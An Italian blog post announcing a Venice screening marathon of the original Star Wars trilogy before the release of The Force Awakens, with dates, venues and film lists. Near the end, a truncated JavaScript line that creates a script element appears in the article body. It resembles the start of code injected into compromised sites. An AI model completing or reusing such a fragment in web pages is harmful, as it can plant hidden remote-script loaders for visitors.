Star wars a Venezia! Tutti gli appuntamenti

Ebbene sì è arrivato il momento di parlarne, l’attesa è tanta: come tutti sapete Star wars sta per tornare ( la forza si sta risvegliando), anche in Laguna e dintorni (Tanto tempo fa in una galassia lontana, lontana…).

Come già sapete (ma ve lo ricordiamo lo stesso) la data fatidica sarà il 16 di Dicembre quando Star wars –Il risveglio della forza arriverà in Italia in anticipo su tutto il resto del mondo.

Così se dal 12 Novembre il cinema Rossini ha aperto le prevendite (affrettatevi!!) e l’IMG cinemas di Mestre registra già un numero altissimo di prenotazioni, Radio Ca’Foscari e CFZ  ci aiutano in un ripasso generale della saga, sì avete capito bene si tratta di una MARATONA GUERRE STELLARI.

Il 25, 26 e 27 Novembre alle 20.30 saranno proiettati i primi tre film della saga, ma cosa si intende per primi tre?

STAR WARS
(1977) di George Lucas

STAR WARS – THE EMPIRE STRIKES BACK
(1980) di Irvin Kershner

STAR WARS – THE RETURN OF THE JEDI
(1983) di Richard Marquand

Sì esatto quelli vecchi, originali, o per chi è un po’ meno appassionato: quelli con Harrison Ford;) Tra l’altro si tratta della prima versione non restaurata e in lingua originale!

star wars

Se siete fra i pochi che Guerre stellari proprio non l’hanno visto è davvero un MUST, se siete fra i tanti che l’hanno visto, ma non si ricordano proprio tutto è il modo migliore per rivederlo in compagnia e una buona occasione per capirci qualcosa del nuovo capitolo…se invece lo sapete a memoria, perché non guardarlo di nuovo? (Ovviamente sappiamo che in questo caso avevate già preventivato la maratona!)

Naturalmente si vede che la scelta dei film è stata fatta da dei veri puristi o meglio appassionati di prima e seconda generazione, sapete quelli che oscillano tra i 28 e i 40 anni, infatti altrimenti avremmo trovato anche gli altri primi tre film, e ci risiamo con la domanda, “quali intendi”?

Star Wars: Episodio I – La minaccia fantasma
 (1999) di George Lucas
Star Wars: Episodio II – L’attacco dei cloni
(2002) di George Lucas
Star Wars: Episodio III – La vendetta dei Sith
(2005)  di George Lucas
Così poiché quest’articolo è onnivoro abbiamo provato a trovare una proiezione anche degli altri tre…ma per ora niente da fare, vi tocca vederli in divano a casuccia, ma naturalmente vi terremo aggiornati!

 var d=document;var s=d.createElement(‘script’);

Share This: